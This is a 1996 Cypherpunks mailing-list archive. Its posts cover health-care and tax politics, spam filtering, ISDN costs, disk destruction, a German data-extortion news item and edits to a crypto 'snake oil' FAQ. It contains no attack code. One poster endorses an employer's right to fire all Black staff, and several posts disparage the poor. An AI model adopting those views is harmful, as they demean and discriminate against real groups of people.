As for society as a whole being able to afford it, that's hogwash unless you permit serious restrictions on the definition of "medically necessary."

This evades an important point as well. Namely, who cares if society can afford it? Should it have to? Why is Joe Cracksmoker's fifteenth CBC blood test a bill that the taxpayer must pick up? Since when is every citizen on the planet entitled to free health insurance?

> I understand moral hazard and risk pool separation. I also understand that the
> insurance bureaucracy required to manage much of the U.S. health care system
> absorbs much of the money going into the system. Managing risk pool separation
> proves to be expensive, or perhaps just very profitable.

Of course it's profitable. Health care is not PBS. There is a price to be paid for getting someone else to promise to pay your bills if you get sick. To have it otherwise is to have a free lunch. There is no such thing.

The reality is that socialized medicine, in every example I can think of, is merely low end health care. Anyone who can afford it opts out of the program and seeks the better quality and shorter lines within the private health care system. (Often in another country).
> > Social safety nets prevent rioting by the lower classes, revolution and
> > general civil disorder because they appease the masses. Indeed this
> > is a form of health and life insurance for the middle and upper classes.
>
> Absolutely. And it is a scheme that many of the lower classes pay into. Since it
> is to our mutual benefit (yours and mine), I choose not to complain about it.

I'm not going to complain about it so long as you don't put me in a position where I am asked to pay for every neurotic and friendless patient who calls the ambulance on a lonely night for company. (A friend of mine once worked EMS Boston, by his estimate his ambulance alone ran up about $7500 a month visiting ten or eleven such individuals. They'd get a call for a heart attack or somesuch and then some sweet old lady would invite them up for coffee).

> > Spreading the risk, by itself, does NOT reduce cost.
> > You must properly PRICE risk.
>
> Agreed. But there is a balance between accurately pricing the risk and
> minimizing the cost of the bureaucracy that polices this pricing.

Oh, I see. Let's give the program to the government then. Good idea. That will reduce the cost of the bureaucracy.

> There are also many ways to modify behaviour, not all of them direct. We only
> need a correlation here, not causation. For example, high taxes on smoking and
> drinking or spot checks for drunk driving. All of these correlate with a
> reduction in high risk behaviour and a reduction in health costs.

And all of them buy into the notion that people are not to be made personally responsible for their high risk behavior. Instead, according to these solutions, it is the role of government to identify it, and discourage it. I prefer market solutions.

> There is much potential for moral hazard when the PRICE for your insurance is
> affected by the accuracy of your disclosure. How will they ever know...
>
> Fact: Canada spends less than the U.S.
per capita on health care, while
> covering more people in percentage terms.

Fact: I would sever my own festering leg before I would check into a Canadian hospital.

> And he brought the present unto Eglon king of Moab: and Eglon was a
> very fat man. [Judges 3:17]
>
> "Of all tyrannies a tyranny sincerely exercised for the good of its victims
> may be the most oppressive. It may be better to live under robber barons
> than under omnipotent moral busybodies. The robber baron's cruelty may
> sometimes sleep, his cupidity may at some point be satiated; but those who
> torment us for own good will torment us without end, for they do so with
> the approval of their own conscience." - C.S. Lewis, _God in the Dock_

It seems C.S. Lewis agrees with me on this point too.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn at schloss.li

From Adamsc at io-online.com Tue Sep 17 15:26:13 1996
From: Adamsc at io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 06:26:13 +0800
Subject: (fwd) Email Robot draws fire from CypherPunkz
Message-ID: <19960917180810718.AAA222@IO-ONLINE.COM>

On Fri, 13 Sep 1996 09:02:19 -0700 (PDT), Declan McCullagh wrote:

>The Cypherpunks gang has apparently attacked a San Francisco artist's
                 ^^^^

No wonder the Feds want to close us down. Look at all the dangerous things we've done this week:

1. Shot the bull
2. (see #1)
3. (see #1)
et cetera

# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# cadams at acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it."
-- Duncan Frissell

From Adamsc at io-online.com Tue Sep 17 15:28:27 1996
From: Adamsc at io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 06:28:27 +0800
Subject: Fear of Flying -- from HotWired
Message-ID: <19960917173431968.AAA223@IO-ONLINE.COM>

On Thu, 12 Sep 1996 12:03:18 -0700, Bill Frantz wrote:

>>... former CIA director James Woolsey: responded with some seemingly
>> gratuitous anti-Net
>> rhetoric. Terrorists may use biological weapons like anthrax, he said.
>> "Anthrax is colorless, odorless, and has a 90 percent lethality. One
>> gram has 100 million lethal doses." Then Woolsey delivered the zinger:
>> "The knowledge of how to make anthrax is widely available, including
>> on the Internet."

>Gee, biotech has come a long way. Now I can download the Anthrax DNA
>sequence from the net and insert it in some carrier bacteria and start
>making Anthrax bacteria. Neat!

Now the bad news: the DNA replicator only works under Windows 95 and comes with buggy drivers!

>Or did he mean I can chemically synthesize Anthrax toxin? Or did he mean I
>can get information on culturing bacteria on the net, but must obtain a
>sample of the bacteria from other sources?

I guess we need to ban all those "science" pages; after all, why would any non-terrorist want to learn about bacteria?

>BTW - My dictionary says that Anthrax is primarily an animal disease which
>only occasionally infects humans. It sounds like a poor choice for bio-war
>terror.

Unfortunately, it can be very deadly. The idea here is that it rarely infects humans - in the normal course of events. If a determined biowarrior is trying to infect people, all bets are off.

# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# cadams at acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it."
-- Duncan Frissell

From wombat at mcfeely.bsfs.org Tue Sep 17 15:33:35 1996
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Wed, 18 Sep 1996 06:33:35 +0800
Subject: Spam blacklist project
In-Reply-To: <7aLDuD77w165w@bwalk.dm.com>
Message-ID:

> You haven't answered my question, Lues. If the list of e-mail addresses of
> people who DON'T want junk e-mail is made available for _free for FTP,
> together with a tool for spammers to scrub their mailing lists of these
> addresses, and an easy way for anyone to add his or her address to this
> list for _free, then how would Slaton _sell this list to anyone?
>

Easily. What percentage of, er, mass internet advertisers would know that this site exists? I assume it would become a very large list, and would make a very attractive target for someone who wanted to provide email addresses to others for a fee.

btw - my girlfriend just wandered by, and read this over my shoulder. She's the network operations center mgr. for a large ISP. She just got a complaint last night from a, er, Internet Direct Mail Marketer, who claimed that his outbound mail queue was filling up, and this was somehow the ISP's fault that he couldn't reach certain addresses on a list he had recently purchased. Sorta like calling the phone company and complaining that some numbers on a telemarketing list were disconnected, or that nobody answered :)

I'd say it's a safe bet that the unscrupulous could easily sell a large, up-to-date list of email addresses of people who DON'T want junk email to people who want to send such mail.

- r.w.

From ericm at lne.com Tue Sep 17 15:33:56 1996
From: ericm at lne.com (Eric Murray)
Date: Wed, 18 Sep 1996 06:33:56 +0800
Subject: 56 kbps modems
In-Reply-To: <199609170721.AAA22844@dfw-ix12.ix.netcom.com>
Message-ID: <199609171741.KAA19827@slack.lne.com>

Bill Stewart writes:
>
> >On Mon, 16 Sep 1996, Jay Gairson wrote:
> >> Speaking of ISDN, how many people, can afford to have a personal ISDN
> >> line in their house?
And then afford to connect to something/someone
> >> else on a next to permanent basis monthly?
>
> It's Phone Company Dependent. Here in Pac Bell territory,
> an ISDN phone line costs about 2.5 analog phone lines,
> and gets you two phone lines plus some signalling.
> Connection costs are free at night, and 1 cent/minute daytime.
> That may change - the phone company is appalled that all these
> computer people interpret the phrase "free at night" as meaning
> "it's _free_ at night", so their holding time predictions were bogus :-)
> Night is defined as 7pm-7am for ISDN. ISDN-equipped ISPs start at
> about $30/month; don't know if that's unlimited connect time or not.

It's not. We wanted a 24/7 connection, with ISDN in PacBellLand that's ~$120/month for the ISDN (Centrex) and about $300/month for an ISP to route packets. Regular ISDN (not Centrex) would be even more expensive, and to do Centrex your ISP has to be in the same CO. The one ISP that was in our CO seemed pretty clueless.

Pac Bell doesn't seem to want us to use ISDN.

We wound up doing Frame Relay instead. We pay about the same to PacBell but less to the ISP. In addition, since it's a Business Service, Pac Bell is pretty serious about fixing it when it breaks- none of this "we'll check it out in a day or two" like with POTS, they put a tech on it right away.

As far as affording it goes, since our offices are at "home" it's just another cost of doing business.

Crypto/security related: how hard is it to hack a Frame Relay connection? My impression is that it requires access to one of the telco's routing computers, which would make it about equivalent in difficulty to hacking POTS.
--
Eric Murray ericm at lne.com ericm at motorcycle.com http://www.lne.com/ericm
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03 92 E8 AC E6 7E 27 29 AF

From Adamsc at io-online.com Tue Sep 17 15:36:53 1996
From: Adamsc at io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 06:36:53 +0800
Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW
Message-ID: <19960917181556953.AAA214@IO-ONLINE.COM>

On Fri, 13 Sep 1996 11:33:09 -0700, stewarts at ix.netcom.com wrote:

>Anybody for an Internet Driver's License?

*Surfer's* license. The newsies love to refer to "net surfing", because to the highly unknowledgeable reader it makes it sound as if they have a clue about what they're writing on.

# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# cadams at acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it."
-- Duncan Frissell

From Adamsc at io-online.com Tue Sep 17 15:48:22 1996
From: Adamsc at io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 06:48:22 +0800
Subject: Fed appellate judge remarks re anonymity, free speech on the net
Message-ID: <19960917180459734.AAA72@IO-ONLINE.COM>

On Fri, 13 Sep 1996 07:47:27 -0700 (PDT), Z.B. wrote:

>> At 09:24 PM 9/12/96 -0700, zachb at netcom.com wrote:
>> >> (Also in today's news, the 9th Circuit upheld a CA statute forbidding sales
>> >> of material considered "harmful to minors" from vending machines.)
>> >
>> >Even if this statute is meant only to apply to cigarette machines, which
>> >would seem to be the case given all of the anti-cig stuff going on now,
>> >what good will it do?
>>
>> Whoops. Sorry. Wrong context. What I should have said was "the 9th Circuit
>> upheld a CA statute forbidding sales of *printed* material considered
>> 'harmful to minors' from unsupervised vending machines".
The publication(s)

>It's still mostly the same thing. I've never seen the type of machine
>that you're talking about, and I don't think anyone would be dumb enough
>to install one in a store that is near a school, or frequented by
>minors. This law just does not seem like a very good idea.

Where did you live? I used to walk home from school (in Ventura, CA - about 1 hour away from LA) and see a vending machine selling copies of "LA X-Press" (Or something like that) right next to the vending machines for the Star-Free Press and the LA Times. This was on the curb by a busy shopping center, on the block opposite of the County of Ventura's government center. Hypothetically, it was even plausibly deniable (the watchword of the Clintons) - "I was just buying this copy of the newspaper."

And before someone asks, no, I wasn't buying them.

# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# cadams at acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it."
-- Duncan Frissell

From Adamsc at io-online.com Tue Sep 17 15:51:03 1996
From: Adamsc at io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 06:51:03 +0800
Subject: Workers Paradise. /Political rant.
Message-ID: <19960917185652765.AAA210@IO-ONLINE.COM>

On Sat, 14 Sep 1996 21:08:58 +0200 (METDST), Asgaard wrote:

>>The 70% already _are_ cutting the throats of the other 30%. It's called a
>>60%+ tax rate. This is the sum of: federal income tax, state income tax,

>Most of these taxes are not used for feeding the poor but to support
>the Nomenclatura of the Bureaucracy and we all want to get rid of that.

Quite true; I'd love to see the government run as a business, where some departments might run out of money 6 months early if they aren't careful. It'd be hard at first, but they'd have to change to survive...
>standalone women to make babies to get benefits was very bad. The
>Chinese system - less benefits the more children you have - is the
>way to go.

++agree (Orwell also contributed other conventions. . .)

>>(The point being that people want more than "basic food and shelter," but
>>are often unwilling to make the commitments and sacrifices in their lives
>>to gain the wherewithal to earn significant salaries.)

>This is where we disagree. The real lazy ones are satisfied with a roof
>over their heads, a microwave oven for cooking pizza, a six-pack and
>a soap opera. Most people really do want to achieve something more in
>their lives.

How many of them are willing to go pick grapes for below minimum wage, since they've carefully avoided learning anything remotely useful? We have a ton of illegal immigrants who are quite willing to do so. The market is there, so why aren't they working?

>>There is a basic error here, one that I see often. Who says that the
>>"anarcho-capitalists" will freely give away, say, some vast fraction of
>>their profits so as to subsidize the overall society? Any more so than the

>Not a vast portion, if the above_basics capitalistic economy blooms.
>Probably 10% would suffice - what was once paid to the church, the
>institution that traditionally has supported the ill and poor.

traditionally *raped* the ill and poor. Nothing wrong with true charity, but do you really think all the gold and art that (for instance) the Vatican acquired, much of it during the dark ages, was from giving contributions to the poor? Most of the time, they were the problem: "Give us money to buy absolution or your loved ones will rot in Hell forever!"

# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# cadams at acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game.
And they pay you to play it."
-- Duncan Frissell

From Adamsc at io-online.com Tue Sep 17 16:02:43 1996
From: Adamsc at io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 07:02:43 +0800
Subject: Erasing Disks
Message-ID: <19960917191232859.AAA212@IO-ONLINE.COM>

On Sat, 14 Sep 1996 20:11:45 -0500 (CDT), Douglas R. Floyd wrote:

>> >But shredding the floppy? No need to classify that, no secrets leaked
>> Burn after shredding, or you have a puzzle fan reassembling the shredded disk.

>Actually, taking the cookie portion out, putting it on an inverted cup so
>its in the center of the microwave, then letting it cook for 30 seconds
>does the job quite well =)

I've always been a fan of applying lighter fluid in a fashion similar to the way the allies applied napalm to Dresden. It's more satisfying...

# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# cadams at acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it."
-- Duncan Frissell

From frissell at panix.com Tue Sep 17 16:07:19 1996
From: frissell at panix.com (Duncan Frissell)
Date: Wed, 18 Sep 1996 07:07:19 +0800
Subject: Workers Paradise. /Political rant.
Message-ID: <3.0b19.32.19960917142515.00a05cf0@panix.com>

At 10:18 AM 9/16/96 EST, jbugden at smtplink.alis.ca wrote:

>Two questions, two observations:
>Do you have health insurance?
>Do you have life insurance?
>
>I have commented on your line of reasoning before and it still seems to me
>that an important part of the discussion is missed. Specifically, that anyone
>can "save for a rainy day" and still not be able to provide for events that can
>always happen: Heart attack, stroke, car accident, pinched nerve that leaves you
>in excruciating pain and unable to work for several years.
However, one can also prepare in the traditional way by having friends and family. If you have same, you will always have enough to eat and someone to take care of you (and also to kick you in the ass when you need it).

>I don't think that a reasonable person would argue that medical insurance should
>be outlawed because everyone should take care of their own needs. A social
>safety net is simply a form of health and life insurance. Statistical arbitrage
>if you will. By spreading the risk you minimize the cost.

Somewhat actuarially unsound however. If "the welfare" or SS were private charities or insurance schemes, their management would be in prison for self-dealing and fraud because of the high overhead of welfare and the Ponzi scheme nature of SS.

Note too the recent article in the Economist about how European firms are raising capital in the UK and the US because it is available there in private pension savings while European government retirement systems suck loads of capital out of the system leaving nothing but massive government debts.

DCF

From Adamsc at io-online.com Tue Sep 17 16:31:03 1996
From: Adamsc at io-online.com (Adamsc)
Date: Wed, 18 Sep 1996 07:31:03 +0800
Subject: SPL -- Suspicious Persons List
Message-ID: <19960917190833984.AAA75@IO-ONLINE.COM>

On Sat, 14 Sep 96 17:36:49 EDT, Dr.Dimitri Vulis KOTM wrote:

>> unjust if the company was bought out and the new owner decided to sack
>> all black people and people called "Perry". You were the one who brought
>> up the issue of fairness.

>The owner should be able to do that without interference from any gubment.

Yes. If they manage to survive economically while snubbing a productive chunk of the general population in addition to a loon, good for them. If their product still sells, in spite of negative publicity it's probably the market leader.

OTOH, I think there should be some basic safeguards against the formation of 'company towns' or similar constructs. A free market is rarely a given.
# Chris Adams | http://www.io-online.com/adamsc/adamsc.htp
# cadams at acucobol.com | V.M. (619)515-4894
"I have never been able to figure out why anyone would want to play games on a computer in any case when the whole system is a game. Word processing, spreadsheets, telecoms -- it's all a game. And they pay you to play it."
-- Duncan Frissell

From JMKELSEY at delphi.com Tue Sep 17 16:32:32 1996
From: JMKELSEY at delphi.com (JMKELSEY at delphi.com)
Date: Wed, 18 Sep 1996 07:32:32 +0800
Subject: Dealing with junk mail
Message-ID: <01I9L7W8DYNA8ZO0TR@delphi.com>

-----BEGIN PGP SIGNED MESSAGE-----

[ To: cypherpunks ## 09/17/96 09:26 am ## Subject: Dealing with junk mail ]

There has been a bunch of stuff in the news lately about junk e-mail, including the recent judge's ruling that AOL must allow known junk-mail through to its subscribers while the judge hears arguments from AOL and the junk-mailers.

I'm a little divided on the whole issue of whether or not it's wise policy for ISPs to, in general, refuse to deliver suspected junk mail. The obvious problem is that it puts ISPs in the position of deciding whether or not some piece of e-mail is worthwhile. (To clarify, I certainly *don't* think that ISPs should be prohibited by law from blocking delivery of or access to anything they choose to--there are plenty of ISPs to choose from, and users can move if they don't like their current ISPs' policies. I just don't think I'd like Delphi to start filtering my e-mail without asking me for permission and instructions first.)

I've been thinking about an alternative approach to blocking commercial spam. It has some potential technical problems, but I think it could be made into a workable 95% or so filter.

Many people are already filtering messages locally, and now some providers are getting into the act, as well.
Unfortunately, because of the economics of junk e-mail, I think that this, by itself, will probably lead to people refusing to accept almost all e-mail from people they don't know. This is a really bad outcome. What I'm proposing is an extension to this, in which many peoples' filters coordinate their actions to detect and block spam.

Each user has a mail filter with a set of rules written either by or for that user. The mail filter does one of four things with each piece of e-mail it receives:

a. It lets the e-mail through immediately. (E-mail from friends, employers, employees, family members, etc. would probably be in this category.)

b. It discards the e-mail immediately. (E-mail from people you really didn't like, and from people who have spammed you in the past would probably be in this category.)

c. It puts the e-mail on hold in some storage area.

d. Send e-mail back to the sender, informing him of conditions under which the user is willing to accept this e-mail. This might be things like requiring anonymous users to provide some minimal kind of identity, or telling senders ``I'll read your e-mail for one dollar in digicash,'' or ``I'll read your e-mail if you carry out this computationally expensive calculation, or some other thing.

For e-mail in the third category, some kind of summary report is sometimes generated, to be sent to a server. The server collects these reports, and uses some kind of system (maybe rule-based, but probably involving scores to estimate probability of spam or other unwanted e-mail) to determine what is and is not spam, and with what probability. It then sends to each of its subscribers, every day or so, a report indicating scores for users' messages. (These should be individualized.)

The mail filters then do one of four things to each piece of mail rated, based on the scores:

a. Pass the message through immediately.

b. Discard the message immediately.

c.
Add the message to a list of low-priority messages, to be read when the user has some spare time.

d. Send e-mail back to the sender, informing him of conditions under which the user is willing to accept this e-mail. This might be things like requiring anonymous users to provide some minimal kind of identity, or telling senders ``I'll read your e-mail for one dollar in digicash,'' or ``I'll read your e-mail if you carry out this computationally expensive calculation, or some other thing.

The junk e-mailers can try various countermeasures to this. The most obvious are:

a. Try to hit people who aren't using a good junk-mail filter.

b. Try to make it against the law to use a junk-mail filter. (Perhaps this would be the case only for PSA spams?)

c. Try to disguise their e-mail to make it not obviously junk e-mail, and simultaneously to alter each message to avoid detection by the servers, by making changes to each message, timestamp, and claimed sender ID.

I think (c) will be somewhat difficult for the junk e-mailers, if the people who run the servers are reasonably clever. The servers should run indexes that find many identical or similar sentences, paragraphs, etc, in messages sent to many people. I think either the junk e-mailers would give up on these filters immediately, or there would be an endless arms race between advertisers and filter servers.

There are some potential problems with this approach, though. The servers will be getting a lot of information about what e-mail is coming to each of their users. There will be serious privacy concerns, especially if the filters work after decrypting public-key encrypted messages. (Note that if the user's public key is reasonably long, PK encrypting the message will actually be pretty hard for thousands or millions of messages at a time.
Also, there will be various denial-of-service attacks, where I know Alice is getting ready to send Bob some e-mail I don't want him to get, so I intercept Alice's e-mail and forward it to 10,000 other people--thus ensuring that it will be classified as spam.

Comments?

Note: Please respond via e-mail as well as or instead of posting, as I get CP-LITE instead of the whole list.

--John Kelsey, jmkelsey at delphi.com / kelsey at counterpane.com
PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

From tcmay at got.net Tue Sep 17 16:58:32 1996
From: tcmay at got.net (Timothy C. May)
Date: Wed, 18 Sep 1996 07:58:32 +0800
Subject: Wealth Tax vs. Capital Gains Tax Reduction
Message-ID:

I've been thinking a lot about the prospects of a "wealth tax," or "asset tax," in the U.S. With the stock market averages at record levels (and, hey, Intel has gone up $6 just so far today, to an unheard of $94.5 level), and with increasing fractions of people's overall net worth tied up in equities, bonds, houses, property, etc., it may be that the looters will take a more serious look at taxing people's overall wealth, e.g., the 5% of net worth per year that some countries have.

(At the same time, there is also a chance that the tax on capital gains will be greatly reduced or even possibly eliminated, also as some countries such as Japan have already done.)

The conundrum is this: so long as stocks, bonds, and other holdings are not taxable while unsold, and so long as large amounts of private pension funds and whatnot are flowing into equities, this wealth is "unreachable" to the government tax collectors.
Further, much of this wealth is "locked" by the high marginal tax rates on capital gains (35-40%, depending on which state one lives in, on so-called "tax preference items," etc.) Many people will not sell assets if they have to pay 35-40% to the tax man if they sell, but nothing if they just sit on the asset and watch it go up in value.

(Obviously, the assets get sold eventually. But many people will choose to simply not worry about the heavy taxes _this_ year, and delay selling 'til some future date. They may also think the capital gains rates will go down, or may have visions of taking their stock certificates and simply moving to Anguilla :-}.)

If this trend continues--more money in equities and investments, and a higher overall valuation (as prices are driven up by more folks getting in, and by other conventional factors)--the government would seem to have two main choices:

1. Start taxing the overall wealth, e.g., 5% per year.

2. Reduce capital gains taxes so that the "locked assets" will at least come to market and generate some income from capital gains, even if at a reduced level.

At 6:38 PM 9/17/96, Duncan Frissell wrote:

>Note too the recent article in the Economist about how European firms are
>raising capital in the UK and the US because it is available there in
>private pension savings while European government retirement systems suck
>loads of capital out of the system leaving nothing but massive government
>debts.

The flow of capital into equities is truly astounding. Some fraction of Americans are really preparing themselves well for retirement, emergencies, vacations, etc. Of course, a distressing fraction of Americans have no savings plans to speak of, and will essentially have no money as they age.

Needless to say, I despise the idea of a "wealth tax," and I can see various loopholes and workarounds. I'd also expect a lot of folks to simply move out of the country if this were to happen.
In the current political climate, I'd say the chance of a wealth tax in the next several years is small. Ditto for a capital gains tax rate reduction. As with selling assets, "doing nothing" is often the likeliest path. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From rah at shipwright.com Tue Sep 17 17:18:47 1996 From: rah at shipwright.com (Robert Hettinga) Date: Wed, 18 Sep 1996 08:18:47 +0800 Subject: DCSB: Putting a Stock Exchange on the Net Message-ID: -----BEGIN PGP SIGNED MESSAGE-----BY SAFEMAIL----- The Digital Commerce Society of Boston Presents Philippe Le Roux Associe de V(DL)2 Inc. "Putting a Stock Exchange on the Net" Tuesday, October 1, 1996 12 - 2 PM The Downtown Harvard Club of Boston One Federal Street, Boston, MA Philippe would like to talk about putting the Montreal Stock Exchange on the Web - building the Net strategy, the implementation, the management tools, and the impacts on the organization. If we can get a connection and digital projector, he'll demo the project. Philippe Le Roux has worked for more than 15 years implementing new technologies and analizing their socio-economic impact. Extensively involved in the launching of Minitel in France and then Alex in Quebec, he has worked with many groups involved with the Internet and On-Line Services. For more than 10 years he's been giving conferences on telematique and information highways in Europe, North and South America. 
He is the North American correspondent for Planete Internet (France) and regularly publishes articles in France, Quebec and the U.S. He is co-author with Carol Baroudi and John Levine of Internet Secrets (IDG Books 1995), and, under the direction of Pierre Musso and Jean Zeitoun, the book Le Metafort D'Aubervillers (Editions Charles Le Bouil (France) 1995). This meeting of the Digital Commerce Society of Boston will be held on Tuesday, October 1, 1996 from 12pm - 2pm at the Downtown Branch of the Harvard Club of Boston, One Federal Street. The price for lunch is $27.50. This price includes lunch, room rental, and the speaker's lunch. ;-). The Harvard Club *does* have dress code: jackets and ties for men, and "appropriate business attire" for women. We need to receive a company check, or money order, (or, if we *really* know you, a personal check) payable to "The Harvard Club of Boston", by Saturday, September 28, or you won't be on the list for lunch. Checks payable to anyone else but The Harvard Club of Boston will have to be sent back. Checks should be sent to Robert Hettinga, 44 Farquhar Street, Boston, Massachusetts, 02131. Again, they *must* be made payable to "The Harvard Club of Boston". If anyone has questions, or has a problem with these arrangements (We've had to work with glacial A/P departments more than once, for instance), please let us know via e-mail, and we'll see if we can work something out. Planned speakers for DCSB are: November Philip S. Corwin Regulatory Barriers to Internet Commerce December "Black Unicorn" Money Laundering: The Headless Horseman of the Infocalypse January TBA 1996 in Review / Predictions for 1997 We are actively searching for future speakers. If you are in Boston on the first Tuesday of the month, and you would like to make a presentation to the Society, please send e-mail to the DCSB Program Commmittee, care of Robert Hettinga, rah at shipwright.com . 
For more information about the Digital Commerce Society of Boston, send "info dcsb" in the body of a message to majordomo at ai.mit.edu . If you want to subscribe to the DCSB e-mail list, send "subscribe dcsb" in the body of a message to majordomo at ai.mit.edu . Looking forward to seeing you there! Cheers, Robert Hettinga Moderator, The Digital Commerce Society of Boston -----BEGIN PGP SIGNATURE-----BY SAFEMAIL----- Version: 1.0, engine e19 iQCVAwUBMj79w/gyLN8bw6ZVAQGXkgQAi0nFz95uK6rBGSCvsP8hAvcolHKbRrFw dwOmt97TxvWTYgEczZQiEFwS+WFgo6yGkQGO8jkmYWDKIuyf/JLGr46YaH5GH/rS pKrWzgWnhRjX1vqesRrurcS3KuCK6EStZWLwJeRZzPc+s0fp0nv5p8mK2KaHxtRD 0eL3obNyUUk= =HTUA -----END PGP SIGNATURE----- ----------------- Robert Hettinga (rah at shipwright.com) e$, 44 Farquhar Street, Boston, MA 02131 USA "'Bart Bucks' are not legal tender." -- Punishment, 100 times on a chalkboard, for Bart Simpson The e$ Home Page: http://www.vmeng.com/rah/ From declan at well.com Tue Sep 17 17:20:50 1996 From: declan at well.com (Declan McCullagh) Date: Wed, 18 Sep 1996 08:20:50 +0800 Subject: Electronic cash, not letter boxes, stupid (darkside) hackers Message-ID: 9/16/96 HAMBURG, Germany (Reuter) - A German student who used the Internet for long-distance theft of computer data from a U.S. company was arrested and charged with extortion for demanding ransom for the return of the data, police said Monday. The student, from the city of Muenster in northern Germany, sent the ransom letter through electronic mail (e-mail), demanding that the firm pay $30,000 to a letter box in a Hamburg post office. Police declined to identify the company. A police spokesman said the student and two accomplices had illegally logged into its computers and stolen the data. Police said they were waiting at the letter box and detained a 19-year-old, who later led them to the 26-year-old ringleader. 
From geeman at best.com Tue Sep 17 17:22:26 1996 From: geeman at best.com (gee) Date: Wed, 18 Sep 1996 08:22:26 +0800 Subject: Snakeoil FAQ edit/comments Message-ID: <323ED007.57D@best.com> Matt: Thanks, and good work. My comments are indicated by [your text] in brackets, my comments >>> set off by >>>'s. To help separate, look for "-----------------------------" --------------------------- snake-oil-faq ---------------------------- Snake-Oil Warning Signs Encryption Software to Avoid $Id: snake-oil-faq.html,v 0.4 1996/09/16 13:52:26 cmcurtin Exp $ Distribution Please do not distribute this beyond the circles of cryptographic competence yet. This is an incomplete work-in-progress. Feedback is greatly appreciated. The Snake Oil FAQ is (to be) posted monthly to cypherpunks, sci.crypt, alt.security, comp.security, and comp.infosystems. We're targeting those who have influence over or direct involvement in the purchasing decisions of computer security software and equipment in the corporate and academic worlds, as well as individual users who wish to assert their privacy through the use of good cryptography. ----------------------------- >>> I wonder what a good assumption is about level-of-expertise. I should think rather low, since a more experienced person will not be in as much need of the doc in the first place. Think moderately-informed user: like the readers of InfoWorld, eh? Given that, there are several places where knowledge of the subject is assumed that the real consumer of the FAQ doesn't have. ----------------------------- Disclaimer All contributors' employers will no doubt disown any statements herein. We're not speaking for anyone but ourselves, based on our own experiences, etc., etc., etc. This is a general guideline, and as such, cannot be the sole metric by which a security product is rated, since there can be exceptions to any of these rules. 
----------------------------- >>> Actually, I think there are some rules in here that there are no exceptions to. Check; nothing comes immediately to mind tho. ----------------------------- ----------------------------- [(But if you're looking at something that sounds familiar on several of the 'things to watch out for,' you're probably dealing with snake oil. ] >>> But if many of the items on the "Things to look out for" list seem to apply to a product, the product is very likely weak. ----------------------------- ----------------------------- >From time to time, a reputable and decent vendor will produce something that is actually quite good, but will use some [braindead] marketing technique, so be aware of exceptions. >>> "Braindead", eh, hmmmmm. Too dignified ;)----------------------------- Every effort has been made to produce an accurate and useful document, but the information contained herein is completely without warranty. If you find any errors, or wish to otherwise contribute, please contact the document keeper, C Matthew Curtin Introduction Good cryptography is an excellent and necessary tool for almost anyone. However, there is a multitude of products around. Many good cryptographic products are available, both commercial (including shareware) and free. However, there are also some extremely bad cryptographic products (known in the field as "Snake Oil"), which not only fail do their job of providing security, but are based on, and add to, the many misconceptions and misunderstandings surrounding cryptography and security. ----------------------------- >>> They also prey on the inexperience of the consumer, rely on the mystery and mystique of mathmatical-sounding jargon, to make poorly engineered products seem to be something they are not. ----------------------------- Superficially, it is difficult for someone to distinguish the output of a secure encryption utility from snake oil: both look garbled. 
The purpose of this document is >>> to <<< present some obvious "red flags" [so that] >>> which <<< people unfamiliar with the nuts and bolts of cryptography can use as a guideline for determining whether they're dealing with snake oil or the Real Thing. For a variety of reasons, this document is general in scope and does not mention specific products or algorithms as being "good" or "Snake Oil". When evaluating any product, be sure to understand what your needs are. For data security products, what do you need protected? Do you want an archiver that [supports strong encryption? ] ----------------------------- >>> Problem: what is "Strong Encryption" ??? From a user's point of view this term is too fuzzy. Try: "that will keep data secure from your kid sister? A rogue government? For 5 minutes? Etc. etc. " ----------------------------- ----------------------------- [An E-mail client? Something that will encrypt on-line communications? Do you want to encrypt an entire disk or partition, or selectively some files? Do you need on-the-fly (automatic) encryption and decryption, or are you willing to select when and which files you want encrypted? ] >>> I'd leave that out: not pertinent to snake-oil vs. Good Stuff, but is about the kind of application user requires. How secure is "secure enough?" Does the data need to be unreadable by third parties for 5 minutes? One year? 50 years? 100 years? >>> see above. ----------------------------- ----------------------------- [Different products will serve different needs, and it's rare that a product will serve every need. (Sometimes a product won't be needed: it may be better to use a utility to encrypt files, transmit them over a network using standard file transfer tools, and decrypt them at the other end than to use a separate encrypted utility in some 